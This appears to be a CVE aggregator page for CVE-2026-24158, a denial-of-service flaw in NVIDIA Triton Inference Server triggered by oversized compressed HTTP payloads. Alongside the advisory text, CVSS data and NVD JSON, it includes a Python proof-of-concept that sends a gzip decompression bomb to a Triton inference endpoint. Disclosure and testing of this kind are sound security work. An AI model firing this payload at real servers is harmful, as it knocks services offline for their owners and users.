CVE-2026-24158

Description

NVIDIA Triton Inference Server contains a vulnerability in the HTTP endpoint where an attacker may cause a denial of service by providing a large compressed payload. A successful exploit of this vulnerability may lead to denial of service.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:triton_inference_server:*:*:*:*:*:*:*:* - VULNERABLE

NVIDIA Triton Inference Server (具体受影响版本请参考NVIDIA官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import gzip
import requests

# Target URL (Replace with actual server address)
target_url = "http://target-triton-server:8000/v2/models/infer"

# Create a large payload (e.g., 100MB of 'A's)
# This simulates the decompressed bomb
original_size = 100 * 1024 * 1024
large_payload = b'A' * original_size

# Compress the payload to make it small enough for network transfer
compressed_payload = gzip.compress(large_payload)

print(f"Original size: {len(large_payload)}, Compressed size: {len(compressed_payload)}")

# Send the malicious request
headers = {
    "Content-Encoding": "gzip",
    "Content-Type": "application/json"
}

try:
    response = requests.post(target_url, data=compressed_payload, headers=headers)
    print(f"Status Code: {response.status_code}")
except Exception as e:
    print(f"Request failed (Server likely crashed): {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24158
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24158
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24158/
[4] VulDB https://vuldb.com/cve/CVE-2026-24158
[5] https://nvd.nist.gov/vuln/detail/CVE-2026-24158
[6] https://nvidia.custhelp.com/app/answers/detail/a_id/5790
[7] https://www.cve.org/CVERecord?id=CVE-2026-24158

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24158", "sourceIdentifier": "[email protected]", "published": "2026-03-24T21:16:27.997", "lastModified": "2026-03-31T01:29:00.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Triton Inference Server contains a vulnerability in the HTTP endpoint where an attacker may cause a denial of service by providing a large compressed payload. A successful exploit of this vulnerability may lead to denial of service."}, {"lang": "es", "value": "NVIDIA Triton Inference Server contiene una vulnerabilidad en el endpoint HTTP donde un atacante puede causar una denegación de servicio al proporcionar una carga útil comprimida grande. Un exploit exitoso de esta vulnerabilidad puede conducir a una denegación de servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:triton_inference_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.01", "matchCriteriaId": "A0D7A8AF-02D2-48AF-8F19-07020D3DA704"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24158", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5790", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24158", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}